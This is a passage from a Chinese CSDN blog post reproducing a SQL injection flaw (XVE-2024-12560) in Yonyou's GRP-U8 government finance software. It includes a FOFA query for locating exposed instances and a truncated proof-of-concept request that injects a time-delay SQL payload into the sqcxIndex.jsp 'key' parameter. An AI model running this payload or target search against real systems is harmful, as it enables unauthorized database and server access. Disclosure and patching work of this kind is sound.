用友GRP-U8 sqcxIndex.jsp SQL注入致RCE漏洞复现(XVE-2024-12560)

0xSecl

已于 2024-06-08 15:37:22 修改

阅读量549

点赞数 5

分类专栏：漏洞复现文章标签：安全 web安全

于 2024-05-27 12:18:31 首次发布

本文链接：https://blog.csdn.net/qq_41904294/article/details/139234676

版权

827 篇文章 1357 订阅 ¥9.90 ¥99.00

订阅专栏

本文详细介绍了用友GRP-U8R10行政事业内控管理软件的sqcxIndex.jsp SQL注入漏洞，该漏洞可能导致未授权的攻击者获取数据库甚至服务器权限。影响范围包括用友的多个产品系列。复现环境通过FOFA查询，而修复建议涉及SQL预编译处理和代码修改。

摘要由CSDN通过智能技术生成

用友GRP-U8R10行政事业内控管理软件是用友公司专注于国家电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域最专业的政府财务管理软件。

用友GRP-U8R10行政事业内控管理软件 sqcxIndex.jsp 接口处存在SQL注入漏洞，未授权的攻击者可利用此漏洞获取数据库权限，深入利用可获取服务器权限。

用友GRP-U8R10产品官方在售及提供服务的版本为U8Manager，产品分B、C、G三个产品系列，以上受到本次通报漏洞的影响。

FOFA：app="用友-GRP-U8"

PoC

GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (

了解本专栏

关注